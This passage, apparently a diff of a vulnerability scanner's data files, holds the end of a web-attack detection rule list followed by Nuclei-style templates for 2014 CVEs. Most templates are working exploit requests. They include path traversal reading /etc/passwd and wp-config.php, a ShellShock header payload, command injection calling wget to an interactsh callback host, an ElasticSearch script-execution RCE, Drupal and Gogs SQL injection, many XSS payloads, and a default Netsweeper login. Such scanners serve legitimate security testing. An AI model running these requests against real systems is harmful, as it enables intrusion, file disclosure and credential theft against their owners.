Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts","tags":["sqli","id"],"impact":5},{"id":55,"rule":"(?:\\sexec\\s+xp_cmdshell)|(?:\"\\s*!\\s*[\"\\w])|(?:from\\W+information_schema\\W)|(?:(?:(?:current_)?user|database|schema|connection_id)\\s*\\([^\\)]*)|(?:\";?\\s*(?:select|union|having)\\s*[^\\s])|(?:\\wiif\\s*\\()|(?:exec\\s+master\\.)|(?:union\\sselect\\s@)|(?:union[\\w(\\s]*select)|(?:select.*\\w?user\\()|(?:into[\\s+]+(?:dump|out)file\\s*\")","description":"Detects MSSQL code execution and information gathering attempts","tags":["sqli","id"],"impact":5},{"id":56,"rule":"(?:merge.*using\\s*\\()|(execute\\s*immediate\\s*\")|(?:\\W+\\d*\\s*having\\s*[^\\s\\-])|(?:match\\s*[\\w(),+-]+\\s*against\\s*\\()","description":"Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections","tags":["sqli","id"],"impact":5},{"id":57,"rule":"(?:,.*[)\\da-f\"]\"(?:\".*\"|\\Z|[^\"]+))|(?:\\Wselect.+\\W*from)|((?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s*\\(\\s*space\\s*\\()","description":"Detects MySQL comment-/space-obfuscated injections and backtick termination","tags":["sqli","id"],"impact":5},{"id":58,"rule":"(?:@[\\w-]+\\s*\\()|(?:]\\s*\\(\\s*[\"!]\\s*\\w)|(?:<[?%](?:php)?.*(?:[?%]>)?)|(?:;[\\s\\w|]*\\$\\w+\\s*=)|(?:\\$\\w+\\s*=(?:(?:\\s*\\$?\\w+\\s*[(;])|\\s*\".*\"))|(?:;\\s*\\{\\W*\\w+\\s*\\()","description":"Detects code injection attempts 1/3","tags":["id","rfe","lfi"],"impact":7},{"id":59,"rule":"(?:(?:[;]+|(<[?%](?:php)?)).*(?:define|eval|file_get_contents|include|require|require_once|set|shell_exec|phpinfo|system|passthru|preg_\\w+|execute)\\s*[\"(@])","description":"Detects code injection attempts 2/3","tags":["id","rfe","lfi"],"impact":7},{"id":60,"rule":"(?:(?:[;]+|(<[?%](?:php)?)).*[^\\w](?:echo|print|print_r|var_dump|[fp]open))|(?:;\\s*rm\\s+-\\w+\\s+)|(?:;.*{.*\\$\\w+\\s*=)|(?:\\$\\w+\\s*\\[\\]\\s*=\\s*)","description":"Detects code injection attempts 3/3","tags":["id","rfe","lfi"],"impact":7},{"id":62,"rule":"(?:function[^(]*\\([^)]*\\))|(?:(?:delete|void|throw|instanceof|new|typeof)[^\\w.]+\\w+\\s*[([])|([)\\]]\\s*\\.\\s*\\w+\\s*=)|(?:\\(\\s*new\\s+\\w+\\s*\\)\\.)","description":"Detects common function declarations and special JS operators","tags":["id","rfe","lfi"],"impact":5},{"id":63,"rule":"(?:[\\w.-]+@[\\w.-]+%(?:[01][\\db-ce-f])+\\w+:)","description":"Detects common mail header injections","tags":["id","spam"],"impact":5},{"id":64,"rule":"(?:\\.pl\\?\\w+=\\w?\\|\\w+;)|(?:\\|\\(\\w+=\\*)|(?:\\*\\s*\\)+\\s*;)","description":"Detects perl echo shellcode injection and LDAP vectors","tags":["lfi","rfe"],"impact":5},{"id":65,"rule":"(?:(^|\\W)const\\s+[\\w\\-]+\\s*=)|(?:(?:do|for|while)\\s*\\([^;]+;+\\))|(?:(?:^|\\W)on\\w+\\s*=[\\w\\W]*(?:on\\w+|alert|eval|print|confirm|prompt))|(?:groups=\\d+\\(\\w+\\))|(?:(.)\\1{128,})","description":"Detects basic XSS DoS attempts","tags":["rfe","dos"],"impact":5},{"id":67,"rule":"(?:\\({2,}\\+{2,}:{2,})|(?:\\({2,}\\+{2,}:+)|(?:\\({3,}\\++:{2,})|(?:\\$\\[!!!\\])","description":"Detects unknown attack vectors based on PHPIDS Centrifuge detection","tags":["xss","csrf","id","rfe","lfi"],"impact":7},{"id":68,"rule":"(?:[\\s\\/\"]+[-\\w\\/\\\\\\*]+\\s*=.+(?:\\/\\s*>))","description":"Finds attribute breaking injections including obfuscated attributes","tags":["xss","csrf"],"impact":4},{"id":69,"rule":"(?:(?:msgbox|eval)\\s*\\+|(?:language\\s*=\\*vbscript))","description":"Finds basic VBScript injection attempts","tags":["xss","csrf"],"impact":4},{"id":70,"rule":"(?:\\[\\$(?:ne|eq|lte?|gte?|n?in|mod|all|size|exists|type|slice|or)\\])","description":"Finds basic MongoDB SQL injection attempts","tags":["sqli"],"impact":4},{"id":71,"rule":"(?:[\\s\\d\\/\"]+(?:on\\w+|style|poster|background)=[$\"\\w])|(?:-type\\s*:\\s*multipart)","description":"finds malicious attribute injection attempts and MHTML attacks","tags":["xss","csrf"],"impact":6},{"id":72,"rule":"(?:(sleep\\((\\s*)(\\d*)(\\s*)\\)|benchmark\\((.*)\\,(.*)\\)))","description":"Detects blind sqli tests using sleep() or benchmark().","tags":["sqli","id"],"impact":4},{"id":73,"rule":"(?:(\\%SYSTEMROOT\\%))","description":"An attacker is trying to locate a file to read or write.","tags":["files","id"],"impact":4},{"id":75,"rule":"(?:(((.*)\\%[c|d|i|e|f|g|o|s|u|x|p|n]){8}))","description":"Looking for a format string attack","tags":["format string"],"impact":4},{"id":76,"rule":"(?:(union(.*)select(.*)from))","description":"Looking for basic sql injection. Common attack string for mysql, oracle and others.","tags":["sqli","id"],"impact":3},{"id":77,"rule":"(?:^(-0000023456|4294967295|4294967296|2147483648|2147483647|0000012345|-2147483648|-2147483649|0000023456|2.2250738585072007e-308|1e309)$)","description":"Looking for intiger overflow attacks, these are taken from skipfish, except 2.2250738585072007e-308 is the \"magic number\" crash","tags":["sqli","id"],"impact":3},{"id":78,"rule":"(?:%23.*?%0A)","description":"Detects SQL comment filter evasion","tags":["format string"],"impact":10},{"id":79,"rule":"((burpcollaborator|pipedream)\\.net|(canarytokens|requestrepo)\\.com|oast\\.(online|(liv|sit|m)e|fun|pro)|\\.ngrok(\\-free\\.(app|dev)|\\.((app|io)|dev)))","description":"Detects out-of-band (OOB) interaction or Server-Side Request Forgery (SSRF) attack attempts","tags":["ssrf","oob"],"impact":10},{"id":80,"rule":"(?i)(?:on(?:webkitanimationiteration|(?:(?:webkitanimation|(?:select|drag))s|t(?:ransition|ouch)s)tart|(?:webkit(?:transi|anima)tione|t(?:ransition|ouch)e|scrolle)nd|(?:beforescriptexecut|afterscriptexecut|(?:p(?:ointerrawupda|(?:opsta|as))|timeupda)t|b(?:eforetoggl|ounc)|(?:pointer|drag)leav|(?:pointer|touch)mov|mouse(?:lea|mo)v|pa(?:gehid|us)|resiz|clos)e|(?:mozfullscreen|fullscreen|(?:selec|dura)tion|hash|cue)change|unhandledrejection|a(?:nimation(?:iteration|cancel|start|end)|fterprint|uxclick)|transitioncancel|toggle\\(popover\\)|loaded(?:meta)?data|(?:canplaythroug|searc)h|(?:transitionru|(?:pointer|key)dow|mousedow|(?:focus|beg)i)n|pointerenter|(?:beforeunloa|invali|(?:seek|end)e|unloa)d|volumechange|c(?:(?:ontextmenu|ut)|opy)|(?:pointerov|drag(?:ent|ov))er|(?:(?:beforeinp|focuso)u|beforeprin|pointerou|beforecu|mouseou|submi|re(?:pea|se)|inpu)t|beforecopy|mouse(?:enter|over|up)|(?:mouse)?wheel|ratechange|(?:pointeru|keyu|dro)p|pageshow|progress|keypress|dblclick|canplay|dragend|playing|s(?:eeking|how)|message|s(?:croll|elect)|toggle|finish|change|focus|(?:erro|blu)r|click|start|drag|load|play|end))\\s*?=","description":"Detects common event attributes and properties","tags":["xss","csrf","id","rfe"],"impact":6}]}
diff --git a/db/cves.json b/db/cves.json
new file mode 100644
index 0000000..59b59bd
--- /dev/null
+++ b/db/cves.json
@@ -0,0 +1 @@
+{"templates":[{"id":"CVE-2002-1131","info":{"name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search","{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search","{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8676","info":{"name":"Simple Online Planning Tool <1.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2908","info":{"name":"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3206","info":{"name":"Seagate BlackArmor NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET /backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2014-2383","info":{"name":"Dompdf < v0.6.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/dompdf.php?input_file=php://filter/resource=/etc/passwd","/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd","/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/pdf","filename=\"dompdf_out.pdf\""],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5181","info":{"name":"Last.fm Rotation 1.0 - Path Traversal","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/lastfm-rotation/\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4535","info":{"name":"Import Legacy Media <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/import-legacy-media/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3120","info":{"name":"ElasticSearch v1.1.1/1.2 RCE","severity":"medium"},"requests":[{"raw":["POST /_search?pretty HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n    \"size\": 1,\n    \"query\": {\n      \"filtered\": {\n        \"query\": {\n          \"match_all\": {\n          }\n        }\n      }\n    },\n    \"script_fields\": {\n        \"command\": {\n            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"cat /etc/passwd\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"\n        }\n    }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9119","info":{"name":"WordPress DB Backup <=4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5258","info":{"name":"webEdition 6.3.8.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3704","info":{"name":"Drupal SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/?q=node&destination=node"],"body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PDOException","{{md5({{num}})}}"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2014-4561","info":{"name":"Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Ultimate Weather","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-10037","info":{"name":"DomPHP 0.83 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2321","info":{"name":"ZTE Cable Modem Web Shell","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web_shell_cmd.gch"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please input shell command","ZTE Corporation. All rights reserved"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4940","info":{"name":"WordPress Plugin Tera Charts - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4577","info":{"name":"WP AmASIN \u2013 The Amazon Affiliate Shop - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/reviews.php?url=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5111","info":{"name":"Fonality trixbox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4550","info":{"name":"Shortcode Ninja <= 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/shortcode-ninja/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9608","info":{"name":"Netsweeper 4.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["webadminU=","webadmin="],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4942","info":{"name":"WordPress EasyCart <2.0.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2014-9180","info":{"name":"Eleanor CMS - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/go.php?http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-6271","info":{"name":"ShellShock - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["","/cgi-bin/status","/cgi-bin/stats","/cgi-bin/test","/cgi-bin/status/status.cgi","/test.cgi","/debug.cgi","/cgi-bin/test-cgi","/cgi-bin/test.cgi"]},"stop-at-first-match":true,"headers":{"Shellshock":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Cookie":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8682","info":{"name":"Gogs (Go Git Service) - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"ok\":true","\"data\"","\"repolink\":\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4544","info":{"name":"Podcast Channels < 0.28 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9614","info":{"name":"Netsweeper 4.0.5 - Default Weak Account","severity":"critical"},"requests":[{"raw":["POST /webadmin/auth/verification.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/webadmin/start/\n\nlogin=branding&password=branding&Submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: ../common/","Location: ../start/"],"condition":"or"},{"type":"word","part":"header","words":["Set-Cookie: webadminU="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2014-6287","info":{"name":"HTTP File Server <2.3c - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>HFS /</title>"]},{"type":"word","part":"header","words":["Set-Cookie: {{str1}}={{str2}};","text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2962","info":{"name":"Belkin N150 Router 1.00.08/1.00.09 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4539","info":{"name":"Movies <= 0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/movies/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Movies =","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.cookie)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4513","info":{"name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["ActiveHelper LiveHelp Live Chat"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</textarea></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-1203","info":{"name":"Eyou E-Mail <3.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntype='|cat /etc/passwd||'\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8799","info":{"name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_USER","DB_HOST"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4210","info":{"name":"Oracle Weblogic - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Search public registries"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9609","info":{"name":"Netsweeper 4.0.8 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9617","info":{"name":"Netsweeper 3.0.6 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-4592","info":{"name":"WP Planet <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["WP Planet"]},{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9615","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5187","info":{"name":"Tom M8te (tom-m8te) Plugin 1.5.3 - Directory Traversal","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/tom-m8te/\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/plugins/tom-m8te/tom-download-file.php?file=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9094","info":{"name":"WordPress DZS-VideoGallery Plugin Cross-Site 